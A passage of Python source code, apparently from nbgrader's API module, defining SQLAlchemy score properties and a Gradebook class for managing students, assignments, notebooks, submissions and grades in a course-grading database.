select([func.coalesce(func.sum(Assignment.max_score), 0.0)])\
.correlate_except(Assignment), deferred=True)
## Written scores
SubmittedNotebook.written_score = column_property(
select([func.coalesce(func.sum(Grade.score), 0.0)])\
.where(and_(
Grade.notebook_id == SubmittedNotebook.id,
GradeCell.id == Grade.cell_id,
GradeCell.cell_type == "markdown"))\
.correlate_except(Grade), deferred=True)
SubmittedAssignment.written_score = column_property(
select([func.coalesce(func.sum(Grade.score), 0.0)])\
.where(and_(
SubmittedNotebook.assignment_id == SubmittedAssignment.id,
Grade.notebook_id == SubmittedNotebook.id,
GradeCell.id == Grade.cell_id,
GradeCell.cell_type == "markdown"))\
.correlate_except(Grade), deferred=True)
## Written max scores
Notebook.max_written_score = column_property(
select([func.coalesce(func.sum(GradeCell.max_score), 0.0)])\
.where(and_(
GradeCell.notebook_id == Notebook.id,
GradeCell.cell_type == "markdown"))\
.correlate_except(GradeCell), deferred=True)
SubmittedNotebook.max_written_score = column_property(
select([Notebook.max_written_score])\
.where(Notebook.id == SubmittedNotebook.notebook_id)\
.correlate_except(Notebook), deferred=True)
Assignment.max_written_score = column_property(
select([func.coalesce(func.sum(GradeCell.max_score), 0.0)])\
.where(and_(
Notebook.assignment_id == Assignment.id,
GradeCell.notebook_id == Notebook.id,
GradeCell.cell_type == "markdown"))\
.correlate_except(GradeCell), deferred=True)
SubmittedAssignment.max_written_score = column_property(
select([Assignment.max_written_score])\
.where(Assignment.id == SubmittedAssignment.assignment_id)\
.correlate_except(Assignment), deferred=True)
## Code scores
SubmittedNotebook.code_score = column_property(
select([func.coalesce(func.sum(Grade.score), 0.0)])\
.where(and_(
Grade.notebook_id == SubmittedNotebook.id,
GradeCell.id == Grade.cell_id,
GradeCell.cell_type == "code"))\
.correlate_except(Grade), deferred=True)
SubmittedAssignment.code_score = column_property(
select([func.coalesce(func.sum(Grade.score), 0.0)])\
.where(and_(
SubmittedNotebook.assignment_id == SubmittedAssignment.id,
Grade.notebook_id == SubmittedNotebook.id,
GradeCell.id == Grade.cell_id,
GradeCell.cell_type == "code"))\
.correlate_except(Grade), deferred=True)
## Code max scores
Notebook.max_code_score = column_property(
select([func.coalesce(func.sum(GradeCell.max_score), 0.0)])\
.where(and_(
GradeCell.notebook_id == Notebook.id,
GradeCell.cell_type == "code"))\
.correlate_except(GradeCell), deferred=True)
SubmittedNotebook.max_code_score = column_property(
select([Notebook.max_code_score])\
.where(Notebook.id == SubmittedNotebook.notebook_id)\
.correlate_except(Notebook), deferred=True)
Assignment.max_code_score = column_property(
select([func.coalesce(func.sum(GradeCell.max_score), 0.0)])\
.where(and_(
Notebook.assignment_id == Assignment.id,
GradeCell.notebook_id == Notebook.id,
GradeCell.cell_type == "code"))\
.correlate_except(GradeCell), deferred=True)
SubmittedAssignment.max_code_score = column_property(
select([Assignment.max_code_score])\
.where(Assignment.id == SubmittedAssignment.assignment_id)\
.correlate_except(Assignment), deferred=True)
## Number of submissions
Assignment.num_submissions = column_property(
select([func.count(SubmittedAssignment.id)])\
.where(SubmittedAssignment.assignment_id == Assignment.id)\
.correlate_except(SubmittedAssignment), deferred=True)
Notebook.num_submissions = column_property(
select([func.count(SubmittedNotebook.id)])\
.where(SubmittedNotebook.notebook_id == Notebook.id)\
.correlate_except(SubmittedNotebook), deferred=True)
## Cell type
Grade.cell_type = column_property(
select([GradeCell.cell_type])\
.where(Grade.cell_id == GradeCell.id)\
.correlate_except(GradeCell), deferred=True)
## Failed tests
Grade.failed_tests = column_property(
(Grade.auto_score < Grade.max_score) & (Grade.cell_type == "code"))
SubmittedNotebook.failed_tests = column_property(
exists().where(and_(
Grade.notebook_id == SubmittedNotebook.id,
Grade.failed_tests))\
.correlate_except(Grade), deferred=True)
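# Usage sketch (hypothetical session variable ``db``, not part of this module):
# because the attributes above are column_property definitions, they can be
# used directly as SQL criteria, e.g.
#
#     db.query(SubmittedNotebook).filter(SubmittedNotebook.needs_manual_grade).all()
#     db.query(SubmittedAssignment).filter(SubmittedAssignment.score < SubmittedAssignment.max_score).all()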
class Gradebook(object):
"""The gradebook object to interface with the database holding
nbgrader grades.
"""
def __init__(self, db_url):
"""Initialize the connection to the database.
Parameters
----------
db_url : string
The URL to the database, e.g. ``sqlite:///grades.db``
"""
# create the connection to the database
engine = create_engine(db_url)
self.db = scoped_session(sessionmaker(autoflush=True, bind=engine))
# this creates all the tables in the database if they don't already exist
Base.metadata.create_all(bind=engine)
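    # Usage sketch (hypothetical database URL, for illustration only):
    #
    #     gb = Gradebook("sqlite:///grades.db")
    #     print(gb.students)   # -> list of Student objects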
#### Students
@property
def students(self):
"""A list of all students in the database."""
return self.db.query(Student)\
.order_by(Student.last_name, Student.first_name)\
.all()
def add_student(self, student_id, **kwargs):
"""Add a new student to the database.
Parameters
----------
student_id : string
The unique id of the student
`**kwargs` : dict
other keyword arguments to the :class:`~nbgrader.api.Student` object
Returns
-------
student : :class:`~nbgrader.api.Student`
"""
student = Student(id=student_id, **kwargs)
self.db.add(student)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return student
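    # Example call (hypothetical id and names, for illustration only):
    #
    #     gb.add_student("jdoe", first_name="Jane", last_name="Doe")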
def find_student(self, student_id):
"""Find a student.
Parameters
----------
student_id : string
The unique id of the student
Returns
-------
student : :class:`~nbgrader.api.Student`
"""
try:
student = self.db.query(Student)\
.filter(Student.id == student_id)\
.one()
except NoResultFound:
raise MissingEntry("No such student: {}".format(student_id))
return student
def update_or_create_student(self, name, **kwargs):
"""Update an existing student, or create it if it doesn't exist.
Parameters
----------
name : string
the name of the student
`**kwargs`
additional keyword arguments for the :class:`~nbgrader.api.Student` object
Returns
-------
student : :class:`~nbgrader.api.Student`
"""
try:
student = self.find_student(name)
except MissingEntry:
student = self.add_student(name, **kwargs)
else:
for attr in kwargs:
setattr(student, attr, kwargs[attr])
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return student
def remove_student(self, name):
"""Deletes an existing student from the gradebook, including any
        submissions that might be associated with that student.
Parameters
----------
name : string
the name of the student to delete
"""
student = self.find_student(name)
for submission in student.submissions:
self.remove_submission(submission.assignment.name, name)
self.db.delete(student)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
#### Assignments
@property
def assignments(self):
"""A list of all assignments in the gradebook."""
return self.db.query(Assignment)\
.order_by(Assignment.duedate, Assignment.name)\
.all()
def add_assignment(self, name, **kwargs):
"""Add a new assignment to the gradebook.
Parameters
----------
name : string
the unique name of the new assignment
`**kwargs`
additional keyword arguments for the :class:`~nbgrader.api.Assignment` object
Returns
-------
assignment : :class:`~nbgrader.api.Assignment`
"""
if 'duedate' in kwargs:
kwargs['duedate'] = utils.parse_utc(kwargs['duedate'])
assignment = Assignment(name=name, **kwargs)
self.db.add(assignment)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return assignment
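    # Example call (hypothetical values): ``duedate`` is run through
    # ``utils.parse_utc`` above, so a string timestamp is accepted, assuming
    # that helper understands the format:
    #
    #     gb.add_assignment("ps1", duedate="2015-02-02 22:00:00 UTC")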
def find_assignment(self, name):
"""Find an assignment in the gradebook.
Parameters
----------
name : string
the unique name of the assignment
Returns
-------
assignment : :class:`~nbgrader.api.Assignment`
"""
try:
assignment = self.db.query(Assignment)\
.filter(Assignment.name == name)\
.one()
except NoResultFound:
raise MissingEntry("No such assignment: {}".format(name))
return assignment
def update_or_create_assignment(self, name, **kwargs):
"""Update an existing assignment, or create it if it doesn't exist.
Parameters
----------
name : string
the name of the assignment
`**kwargs`
additional keyword arguments for the :class:`~nbgrader.api.Assignment` object
Returns
-------
assignment : :class:`~nbgrader.api.Assignment`
"""
try:
assignment = self.find_assignment(name)
except MissingEntry:
assignment = self.add_assignment(name, **kwargs)
else:
for attr in kwargs:
if attr == 'duedate':
setattr(assignment, attr, utils.parse_utc(kwargs[attr]))
else:
setattr(assignment, attr, kwargs[attr])
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return assignment
def remove_assignment(self, name):
"""Deletes an existing assignment from the gradebook, including any
        submissions that might be associated with that assignment.
Parameters
----------
name : string
the name of the assignment to delete
"""
assignment = self.find_assignment(name)
for submission in assignment.submissions:
self.remove_submission(name, submission.student.id)
for notebook in assignment.notebooks:
self.remove_notebook(notebook.name, name)
self.db.delete(assignment)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
#### Notebooks
def add_notebook(self, name, assignment, **kwargs):
"""Add a new notebook to an assignment.
Parameters
----------
name : string
the name of the new notebook
assignment : string
the name of an existing assignment
`**kwargs`
additional keyword arguments for the :class:`~nbgrader.api.Notebook` object
Returns
-------
notebook : :class:`~nbgrader.api.Notebook`
"""
notebook = Notebook(
name=name, assignment=self.find_assignment(assignment), **kwargs)
self.db.add(notebook)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return notebook
def find_notebook(self, name, assignment):
"""Find a particular notebook in an assignment.
Parameters
----------
name : string
the name of the notebook
assignment : string
the name of the assignment
Returns
-------
notebook : :class:`~nbgrader.api.Notebook`
"""
try:
notebook = self.db.query(Notebook)\
.join(Assignment, Assignment.id == Notebook.assignment_id)\
.filter(Notebook.name == name, Assignment.name == assignment)\
.one()
except NoResultFound:
raise MissingEntry("No such notebook: {}/{}".format(assignment, name))
return notebook
def update_or_create_notebook(self, name, assignment, **kwargs):
"""Update an existing notebook, or create it if it doesn't exist.
Parameters
----------
name : string
the name of the notebook
assignment : string
the name of the assignment
`**kwargs`
additional keyword arguments for the :class:`~nbgrader.api.Notebook` object
Returns
-------
notebook : :class:`~nbgrader.api.Notebook`
"""
try:
notebook = self.find_notebook(name, assignment)
except MissingEntry:
notebook = self.add_notebook(name, assignment, **kwargs)
else:
for attr in kwargs:
setattr(notebook, attr, kwargs[attr])
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return notebook
def remove_notebook(self, name, assignment):
"""Deletes an existing notebook from the gradebook, including any
        submissions that might be associated with that notebook.
Parameters
----------
name : string
the name of the notebook to delete
assignment : string
the name of an existing assignment
"""
notebook = self.find_notebook(name, assignment)
for submission in notebook.submissions:
self.remove_submission_notebook(name, assignment, submission.student.id)
for grade_cell in notebook.grade_cells:
self.db.delete(grade_cell)
for solution_cell in notebook.solution_cells:
self.db.delete(solution_cell)
for source_cell in notebook.source_cells:
self.db.delete(source_cell)
self.db.delete(notebook)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
#### Grade cells
def add_grade_cell(self, name, notebook, assignment, **kwargs):
"""Add a new grade cell to an existing notebook of an existing
assignment.
Parameters
----------
name : string
the name of the new grade cell
notebook : string
the name of an existing notebook
assignment : string
the name of an existing assignment
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.GradeCell`
Returns
-------
grade_cell : :class:`~nbgrader.api.GradeCell`
"""
notebook = self.find_notebook(notebook, assignment)
grade_cell = GradeCell(name=name, notebook=notebook, **kwargs)
self.db.add(grade_cell)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return grade_cell
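    # Example call (hypothetical names; ``max_score`` and ``cell_type`` are
    # GradeCell columns used by the score properties defined above):
    #
    #     gb.add_grade_cell("test_squares", "problem1", "ps1", max_score=1, cell_type="code")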
def find_grade_cell(self, name, notebook, assignment):
"""Find a grade cell in a particular notebook of an assignment.
Parameters
----------
name : string
the name of the grade cell
notebook : string
the name of the notebook
assignment : string
the name of the assignment
Returns
-------
grade_cell : :class:`~nbgrader.api.GradeCell`
"""
try:
grade_cell = self.db.query(GradeCell)\
.join(Notebook, Notebook.id == GradeCell.notebook_id)\
.join(Assignment, Assignment.id == Notebook.assignment_id)\
.filter(
GradeCell.name == name,
Notebook.name == notebook,
Assignment.name == assignment)\
.one()
except NoResultFound:
raise MissingEntry("No such grade cell: {}/{}/{}".format(assignment, notebook, name))
return grade_cell
def update_or_create_grade_cell(self, name, notebook, assignment, **kwargs):
"""Update an existing grade cell in a notebook of an assignment, or
create the grade cell if it does not exist.
Parameters
----------
name : string
the name of the grade cell
notebook : string
the name of the notebook
assignment : string
the name of the assignment
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.GradeCell`
Returns
-------
grade_cell : :class:`~nbgrader.api.GradeCell`
"""
try:
grade_cell = self.find_grade_cell(name, notebook, assignment)
except MissingEntry:
grade_cell = self.add_grade_cell(name, notebook, assignment, **kwargs)
else:
for attr in kwargs:
setattr(grade_cell, attr, kwargs[attr])
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return grade_cell
#### Solution cells
def add_solution_cell(self, name, notebook, assignment, **kwargs):
"""Add a new solution cell to an existing notebook of an existing
assignment.
Parameters
----------
name : string
the name of the new solution cell
notebook : string
the name of an existing notebook
assignment : string
the name of an existing assignment
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.SolutionCell`
Returns
-------
solution_cell : :class:`~nbgrader.api.SolutionCell`
"""
notebook = self.find_notebook(notebook, assignment)
solution_cell = SolutionCell(name=name, notebook=notebook, **kwargs)
self.db.add(solution_cell)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return solution_cell
def find_solution_cell(self, name, notebook, assignment):
"""Find a solution cell in a particular notebook of an assignment.
Parameters
----------
name : string
the name of the solution cell
notebook : string
the name of the notebook
assignment : string
the name of the assignment
Returns
-------
solution_cell : :class:`~nbgrader.api.SolutionCell`
"""
try:
solution_cell = self.db.query(SolutionCell)\
.join(Notebook, Notebook.id == SolutionCell.notebook_id)\
.join(Assignment, Assignment.id == Notebook.assignment_id)\
.filter(SolutionCell.name == name, Notebook.name == notebook, Assignment.name == assignment)\
.one()
except NoResultFound:
raise MissingEntry("No such solution cell: {}/{}/{}".format(assignment, notebook, name))
return solution_cell
def update_or_create_solution_cell(self, name, notebook, assignment, **kwargs):
"""Update an existing solution cell in a notebook of an assignment, or
create the solution cell if it does not exist.
Parameters
----------
name : string
the name of the solution cell
notebook : string
the name of the notebook
assignment : string
the name of the assignment
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.SolutionCell`
Returns
-------
solution_cell : :class:`~nbgrader.api.SolutionCell`
"""
try:
solution_cell = self.find_solution_cell(name, notebook, assignment)
except MissingEntry:
solution_cell = self.add_solution_cell(name, notebook, assignment, **kwargs)
else:
for attr in kwargs:
setattr(solution_cell, attr, kwargs[attr])
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
            self.db.rollback()
            raise InvalidEntry(*e.args)
return solution_cell
#### Source cells
def add_source_cell(self, name, notebook, assignment, **kwargs):
"""Add a new source cell to an existing notebook of an existing
assignment.
Parameters
----------
name : string
the name of the new source cell
notebook : string
the name of an existing notebook
assignment : string
the name of an existing assignment
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.SourceCell`
Returns
-------
source_cell : :class:`~nbgrader.api.SourceCell`
"""
notebook = self.find_notebook(notebook, assignment)
source_cell = SourceCell(name=name, notebook=notebook, **kwargs)
self.db.add(source_cell)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return source_cell
def find_source_cell(self, name, notebook, assignment):
"""Find a source cell in a particular notebook of an assignment.
Parameters
----------
name : string
the name of the source cell
notebook : string
the name of the notebook
assignment : string
the name of the assignment
Returns
-------
source_cell : :class:`~nbgrader.api.SourceCell`
"""
try:
source_cell = self.db.query(SourceCell)\
.join(Notebook, Notebook.id == SourceCell.notebook_id)\
.join(Assignment, Assignment.id == Notebook.assignment_id)\
.filter(SourceCell.name == name, Notebook.name == notebook, Assignment.name == assignment)\
.one()
except NoResultFound:
raise MissingEntry("No such source cell: {}/{}/{}".format(assignment, notebook, name))
return source_cell
def update_or_create_source_cell(self, name, notebook, assignment, **kwargs):
"""Update an existing source cell in a notebook of an assignment, or
create the source cell if it does not exist.
Parameters
----------
name : string
the name of the source cell
notebook : string
the name of the notebook
assignment : string
the name of the assignment
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.SourceCell`
Returns
-------
source_cell : :class:`~nbgrader.api.SourceCell`
"""
try:
source_cell = self.find_source_cell(name, notebook, assignment)
except MissingEntry:
source_cell = self.add_source_cell(name, notebook, assignment, **kwargs)
else:
for attr in kwargs:
setattr(source_cell, attr, kwargs[attr])
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
            self.db.rollback()
            raise InvalidEntry(*e.args)
return source_cell
#### Submissions
def add_submission(self, assignment, student, **kwargs):
"""Add a new submission of an assignment by a student.
This method not only creates the high-level submission object, but also
mirrors the entire structure of the existing assignment. Thus, once this
method has been called, the new submission exists and is completely
ready to be filled in with grades and comments.
Parameters
----------
assignment : string
the name of an existing assignment
student : string
the name of an existing student
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.SubmittedAssignment`
Returns
-------
submission : :class:`~nbgrader.api.SubmittedAssignment`
"""
if 'timestamp' in kwargs:
kwargs['timestamp'] = utils.parse_utc(kwargs['timestamp'])
try:
submission = SubmittedAssignment(
assignment=self.find_assignment(assignment),
student=self.find_student(student),
**kwargs)
for notebook in submission.assignment.notebooks:
nb = SubmittedNotebook(notebook=notebook, assignment=submission)
for grade_cell in notebook.grade_cells:
Grade(cell=grade_cell, notebook=nb)
for solution_cell in notebook.solution_cells:
Comment(cell=solution_cell, notebook=nb)
self.db.add(submission)
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return submission
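    # Example call (hypothetical names): the assignment and student must
    # already exist; empty Grade and Comment rows are created to mirror the
    # assignment structure:
    #
    #     gb.add_submission("ps1", "jdoe")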
def find_submission(self, assignment, student):
"""Find a student's submission for a given assignment.
Parameters
----------
assignment : string
the name of an assignment
student : string
the unique id of a student
Returns
-------
submission : :class:`~nbgrader.api.SubmittedAssignment`
"""
try:
submission = self.db.query(SubmittedAssignment)\
.join(Assignment, Assignment.id == SubmittedAssignment.assignment_id)\
.join(Student, Student.id == SubmittedAssignment.student_id)\
.filter(Assignment.name == assignment, Student.id == student)\
.one()
except NoResultFound:
raise MissingEntry("No such submission: {} for {}".format(
assignment, student))
return submission
def update_or_create_submission(self, assignment, student, **kwargs):
"""Update an existing submission of an assignment by a given student,
or create a new submission if it doesn't exist.
See :func:`~nbgrader.api.Gradebook.add_submission` for additional
details.
Parameters
----------
assignment : string
the name of an existing assignment
student : string
the name of an existing student
`**kwargs`
additional keyword arguments for :class:`~nbgrader.api.SubmittedAssignment`
Returns
-------
submission : :class:`~nbgrader.api.SubmittedAssignment`
"""
try:
submission = self.find_submission(assignment, student)
except MissingEntry:
submission = self.add_submission(assignment, student, **kwargs)
else:
for attr in kwargs:
if attr == 'timestamp':
setattr(submission, attr, utils.parse_utc(kwargs[attr]))
else:
setattr(submission, attr, kwargs[attr])
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
return submission
def remove_submission(self, assignment, student):
"""Removes a submission from the database.
Parameters
----------
assignment : string
the name of an assignment
student : string
the name of a student
"""
submission = self.find_submission(assignment, student)
for notebook in submission.notebooks:
self.remove_submission_notebook(notebook.name, assignment, student)
self.db.delete(submission)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
def remove_submission_notebook(self, notebook, assignment, student):
"""Removes a submitted notebook from the database.
Parameters
----------
notebook : string
the name of a notebook
assignment : string
the name of an assignment
student : string
the name of a student
"""
submission = self.find_submission_notebook(notebook, assignment, student)
for grade in submission.grades:
self.db.delete(grade)
for comment in submission.comments:
self.db.delete(comment)
self.db.delete(submission)
try:
self.db.commit()
except (IntegrityError, FlushError) as e:
self.db.rollback()
raise InvalidEntry(*e.args)
def assignment_submissions(self, assignment):
"""Find all submissions of a given assignment.
Parameters
----------
assignment : string
the name of an assignment
Returns
-------
submissions : list
A list of :class:`~nbgrader.api.SubmittedAssignment` objects
"""
return self.db.query(SubmittedAssignment)\
.join(Assignment, Assignment.id == SubmittedAssignment.assignment_id)\
.filter(Assignment.name == assignment)\
.all()
def notebook_submissions(self, notebook, assignment):
"""Find all submissions of a given notebook in a given assignment.
Parameters
----------
notebook : string
            the name of a notebook
assignment : string
the name of an assignment
Returns
-------
submissions : list
A list of :class:`~nbgrader.api.SubmittedNotebook` objects
"""
return self.db.query(SubmittedNotebook)\
.join(Notebook, Notebook.id == SubmittedNotebook.notebook_id)\
.join(SubmittedAssignment, SubmittedAssignment.id == SubmittedNotebook.assignment_id)\
.join(Assignment, Assignment.id == SubmittedAssignment.assignment_id)\
.filter(Notebook.name == notebook, Assignment.name == assignment)\
.all()
def student_submissions(self, student):
"""Find all submissions by a given student.
Parameters
----------
student : string
the student's unique id
Returns
-------
submissions : list
A list of :class:`~nbgrader.api.SubmittedAssignment` objects
"""
return self.db.query(SubmittedAssignment)\
.join(Student, Student.id == SubmittedAssignment.student_id)\
.filter(Student.id == student)\
.all()
def find_submission_notebook(self, notebook, assignment, student):
"""Find a particular notebook in a student's submission for a given
assignment.
Parameters
----------
notebook : string
the name of a notebook
assignment : string
the name of an assignment
student : string
the unique id of a student
Returns
-------
notebook : :class:`~nbgrader.api.SubmittedNotebook`
"""
try:
notebook = self.db.query(SubmittedNotebook)\
.join(Notebook, Notebook.id == SubmittedNotebook.notebook_id)\
.join(SubmittedAssignment, SubmittedAssignment.id == SubmittedNotebook.assignment_id)\
.join(Assignment, Assignment.id == SubmittedAssignment.assignment_id)\
.join(Student, Student.id == SubmittedAssignment.student_id)\
.filter(
Notebook.name == notebook,
Assignment.name == assignment,
Student.id == student)\
.one()
except NoResultFound:
raise MissingEntry("No such submitted notebook: {}/{} for {}".format(
assignment, notebook, student))
return notebook
def find_submission_notebook_by_id(self, notebook_id):
"""Find a submitted notebook by its unique id.
Parameters
----------
notebook_id : string
the unique id of the submitted notebook
Returns
-------
notebook : :class:`~nbgrader.api.SubmittedNotebook`
"""
try:
notebook = self.db.query(SubmittedNotebook)\
.filter(SubmittedNotebook.id == notebook_id)\
.one()
except NoResultFound:
raise MissingEntry("No such submitted notebook: {}".format(notebook_id))
return notebook
def find_grade(self, grade_cell, notebook, assignment, student):
"""Find a particular grade in a notebook in a student's submission
for a given assignment.
Parameters
----------
grade_cell : string
the name of a grade cell
notebook : string
the name of a notebook
assignment : string
the name of an assignment
student : string
the unique id of a student
Returns
-------
grade : :class:`~nbgrader.api.Grade`
"""
try:
grade = self.db.query(Grade)\
.join(GradeCell, GradeCell.id == Grade.cell_id)\
.join(SubmittedNotebook, SubmittedNotebook.id == Grade.notebook_id)\
.join(Notebook, Notebook.id == SubmittedNotebook.notebook_id)\
.join(SubmittedAssignment, SubmittedAssignment.id == SubmittedNotebook.assignment_id)\
.join(Assignment, Assignment.id == SubmittedAssignment.assignment_id)\
.join(Student, Student.id == SubmittedAssignment.student_id)\
.filter(
GradeCell.name == grade_cell,
Notebook.name == notebook,
Assignment.name == assignment,
Student.id == student)\
.one()
except NoResultFound:
raise MissingEntry("No such grade: {}/{}/{} for {}".format(
assignment, notebook, grade_cell, student))
return grade
def find_grade_by_id(self, grade_id):
"""Find a grade by its unique id.
Parameters
----------
grade_id : string
the unique id of the grade
Returns
-------
grade : :class:`~nbgrader.api.Grade`
"""
try:
grade = self.db.query(Grade).filter(Grade.id == grade_id).one()
except NoResultFound:
raise MissingEntry("No such grade: {}".format(grade_id))
return grade
def find_comment(self, solution_cell, notebook, assignment, student):
"""Find a particular comment in a notebook in a student's submission
for a given assignment.
Parameters
----------
solution_cell : string
the name of a solution cell
notebook : string
the name of a notebook
assignment : string
the name of an assignment
student : string
the unique id of a student
Returns
-------
comment : :class:`~nbgrader.api.Comment`
"""
try:
comment = self.db.query(Comment)\
.join(SolutionCell, SolutionCell.id == Comment.cell_id)\
.join(SubmittedNotebook, SubmittedNotebook.id == Comment.notebook_id)\
.join(Notebook, Notebook.id == SubmittedNotebook.notebook_id)\
.join(SubmittedAssignment, SubmittedAssignment.id == SubmittedNotebook.assignment_id)\
.join(Assignment, Assignment.id == SubmittedAssignment.assignment_id)\
.join(Student, Student.id == SubmittedAssignment.student_id)\
.filter(
SolutionCell.name == solution_cell,
Notebook.name == notebook,
Assignment.name == assignment,
Student.id == student)\
.one()
except NoResultFound:
raise MissingEntry("No such comment: {}/{}/{} for {}".format(
assignment, notebook, solution_cell, student))
return comment
def find_comment_by_id(self, comment_id):
"""Find a comment by its unique id.
Parameters
----------
comment_id : string
the unique id of the comment
Returns
-------
comment : :class:`~nbgrader.api.Comment`
"""
try:
comment = self.db.query(Comment).filter(Comment.id == comment_id).one()
except NoResultFound:
raise MissingEntry("No such comment: {}".format(comment_id))
return comment
def average_assignment_score(self, assignment_id):
"""Compute the average score for an assignment.
Parameters
----------
assignment_id : string
the name of the assignment
Returns
-------
score : float
The average score
"""
assignment = self.find_assignment(assignment_id)
if assignment.num_submissions == 0:
return 0.0
score_sum = self.db.query(func.coalesce(func.sum(Grade.score), 0.0))\
.join(GradeCell, Notebook, Assignment)\
.filter(Assignment.name == assignment_id).scalar()
return score_sum / assignment.num_submissions
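    # e.g. (hypothetical data): gb.average_assignment_score("ps1") -> 7.5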
def average_assignment_code_score(self, assignment_id):
"""Compute the average code score for an assignment.
Parameters
----------
assignment_id : string
the name of the assignment
Returns
-------
score : float
The average code score
"""
assignment = self.find_assignment(assignment_id)
if assignment.num_submissions == 0:
return 0.0
score_sum = self.db.query(func.coalesce(func.sum(Grade.score), 0.0))\
.join(GradeCell, Notebook, Assignment)\
.filter(and_(
Assignment.name == assignment_id,
Notebook.assignment_id == Assignment.id,
GradeCell.notebook_id == Notebook.id,
Grade.cell_id == GradeCell.id,
GradeCell.cell_type == "code")).scalar()
return score_sum / assignment.num_submissions
def average_assignment_written_score(self, assignment_id):
"""Compute the average written score for an assignment.
Parameters
----------
assignment_id : string
the name of the assignment
Returns
-------
score : float
The average written score
"""
assignment = self.find_assignment(assignment_id)
if assignment.num_submissions == 0:
return 0.0
score_sum = self.db.query(func.coalesce(func.sum(Grade.score), 0.0))\
.join(GradeCell, Notebook, Assignment)\
.filter(and_(
Assignment.name == assignment_id,
Notebook.assignment_id == Assignment.id,
GradeCell.notebook_id == Notebook.id,
Grade.cell_id == GradeCell.id,
GradeCell.cell_type == "markdown")).scalar()
return score_sum / assignment.num_submissions
def average_notebook_score(self, notebook_id, assignment_id):
"""Compute the average score for a particular notebook in an assignment.
Parameters
----------
notebook_id : string
the name of the notebook
assignment_id : string
the name of the assignment
Returns
-------
score : float
The average notebook score
"""
notebook = self.find_notebook(notebook_id, assignment_id)
if notebook.num_submissions == 0:
return 0.0
score_sum = self.db.query(func.coalesce(func.sum(Grade.score), 0.0))\
.join(SubmittedNotebook, Notebook, Assignment)\
.filter(and_(
Notebook.name == notebook_id,
Assignment.name == assignment_id)).scalar()
return score_sum / notebook.num_submissions
def average_notebook_code_score(self, notebook_id, assignment_id):
"""Compute the average code score for a particular notebook in an
assignment.
Parameters
----------
notebook_id : string
the name of the notebook
assignment_id : string
the name of the assignment
Returns
-------
score : float
The average notebook code score
"""
notebook = self.find_notebook(notebook_id, assignment_id)
if notebook.num_submissions == 0:
return 0.0
score_sum = self.db.query(func.coalesce(func.sum(Grade.score), 0.0))\
.join(GradeCell, Notebook, Assignment)\
.filter(and_(
Notebook.name == notebook_id,
Assignment.name == assignment_id,
Notebook.assignment_id == Assignment.id,
GradeCell.notebook_id == Notebook.id,
Grade.cell_id == GradeCell.id,
GradeCell.cell_type == "code")).scalar()
return score_sum / notebook.num_submissions
def average_notebook_written_score(self, notebook_id, assignment_id):
"""Compute the average written score for a particular notebook in an
assignment.
Parameters
----------
notebook_id : string
the name of the notebook
assignment_id : string
the name of the assignment
Returns
-------
score : float
The average notebook written score
"""
notebook = self.find_notebook(notebook_id, assignment_id)
if notebook.num_submissions == 0:
return 0.0
score_sum = self.db.query(func.coalesce(func.sum(Grade.score), 0.0))\
.join(GradeCell, Notebook, Assignment)\
.filter(and_(
Notebook.name == notebook_id,
Assignment.name == assignment_id,
Notebook.assignment_id == Assignment.id,
GradeCell.notebook_id == Notebook.id,
Grade.cell_id == GradeCell.id,
GradeCell.cell_type == "markdown")).scalar()
return score_sum / notebook.num_submissions
def student_dicts(self):
"""Returns a list of dictionaries containing student data. Equivalent
to calling :func:`~nbgrader.api.Student.to_dict` for each student,
except that this method is implemented using proper SQL joins and is
much faster.
Returns
-------
students : list
A list of dictionaries, one per student
"""
# subquery the scores
scores = self.db.query(
Student.id,
func.sum(Grade.score).label("score")
).join(SubmittedAssignment, SubmittedNotebook, Grade)\
.group_by(Student.id)\
.subquery()
# full query
students = self.db.query(
Student.id, Student.first_name, Student.last_name,
Student.email, func.coalesce(scores.c.score, 0.0),
func.sum(GradeCell.max_score)
).outerjoin(scores, Student.id == scores.c.id)\
.group_by(Student.id)\
.all()
keys = ["id", "first_name", "last_name", "email", "score", "max_score"]
return [dict(zip(keys, x)) for x in students]
def notebook_submission_dicts(self, notebook_id, assignment_id):
"""Returns a list of dictionaries containing submission data. Equivalent
to calling :func:`~nbgrader.api.SubmittedNotebook.to_dict` for each
submission, except that this method is implemented using proper SQL
joins and is much faster.
Parameters
----------
notebook_id : string
the name of the notebook
assignment_id : string
the name of the assignment
Returns
-------
submissions : list
A list of dictionaries, one per submitted notebook
"""
# subquery the code scores
